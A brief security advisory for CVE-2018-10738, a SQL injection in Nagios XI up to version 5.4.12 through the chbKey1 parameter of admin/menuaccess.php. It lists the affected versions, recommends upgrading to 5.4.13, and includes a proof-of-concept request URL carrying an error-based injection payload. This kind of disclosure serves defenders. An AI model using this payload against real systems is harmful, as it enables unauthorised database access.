### NagiosXI <= 5.4.12 menuaccess.php SQL injection(CVE-2018-10738)#### DescriptionA SQL injection issue was discovered in Nagios XI via the admin/menuaccess.php chbKey1parameter.#### Affected Version* Nagios XI 5.2.x* Nagios XI 5.4.x before 5.4.13#### Proof of concept“`http://xxxx/nagiosql/admin/menuaccess.phpchbKey1=' or updatexml(2,concat(0x7e,(version())),0) or''#&selSubMenu=1&subSave=1“`#### FixUpgrade to version 5.4.13